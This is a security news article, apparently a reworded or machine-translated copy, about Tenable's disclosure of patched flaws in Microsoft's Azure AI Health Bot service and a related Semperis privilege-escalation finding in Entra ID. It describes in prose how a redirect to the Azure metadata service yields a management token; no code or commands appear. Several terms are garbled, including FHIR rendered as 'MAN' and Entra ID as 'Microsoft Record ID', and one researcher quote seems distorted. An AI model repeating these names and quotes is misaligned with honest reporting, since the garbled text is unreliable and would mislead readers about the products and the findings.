Cybersecurity researchers have discovered two security flaws in Microsoft’s Azure Health Bot service that, if exploited, could allow malicious actors to achieve lateral movement in a client environment and gain access to sensitive patient data.
Critical issues now fixed by Microsoft could have allowed resource access between tenants on the service, Tenable said in a new the report shared with The Hacker News.
The Azure AI Health Bot service is a cloud platform enabling developers in healthcare organizations to create and deploy AI-powered virtual healthcare assistants and create co-pilots to manage administrative workloads and interact with patients.
These include bots created by insurance providers that allow customers to view claim status and ask questions about benefits and services, as well as bots operated by healthcare organizations to help patients find appropriate care or find nearby doctors.
Tenable’s research specifically focuses on one aspect of the Azure AI Health Bot Service called Data connectionwhich, as the name suggests, offers a mechanism to integrate data from external sources, be it third parties or service providers’ own API endpoints.
While this feature has built-in protections to prevent unauthorized access to internal APIs, further investigation revealed that these protections can be bypassed by issuing redirect responses (such as 301 or 302 status codes) when configuring a data connection using external host under own control.
By configuring the host to respond to requests with a 301 redirect response destined for the Azure Metadata Service (IMDS), Tenable said it’s possible to get a valid response with metadata and then get an access token for management.azure(.)com.
The token can then be used to enumerate the subscriptions it provides access to by calling a Microsoft endpoint, which in turn returns an internal subscription ID, which can ultimately be used to enumerate available resources by calling another API.
Separately, it also turned out that other end point related to the integration of systems that support rapid healthcare interaction resources (MAN) data exchange format was also susceptible to the same attack.
Tenable said it reported its findings to Microsoft in June and July 2024, after which the Windows maker began rolling out fixes to all regions. There is no evidence that the problem has been exploited in the wild.
“These vulnerabilities raise concerns about how chatbots could be used to reveal sensitive information,” Tenabla said in a statement. “Specifically, the vulnerabilities included a flaw in the underlying architecture of the chatbot service, highlighting the importance of traditional web and cloud security in the age of AI chatbots.”
The disclosure comes days after Semperis detailed the attack technique under the name UnOAuthorized which allows you to elevate your privileges using Microsoft Record ID (formerly Azure Active Directory), including the ability to add and remove users from privileged roles. Microsoft has since patched the security hole.
“A threat actor could use this access to elevate privileges to a global administrator and install additional security features in the tenant,” security researcher Eric Woodruff said. “An attacker could also use this access to perform lateral movement to any system in Microsoft 365 or Azure, as well as any SaaS application connected to Entra ID.”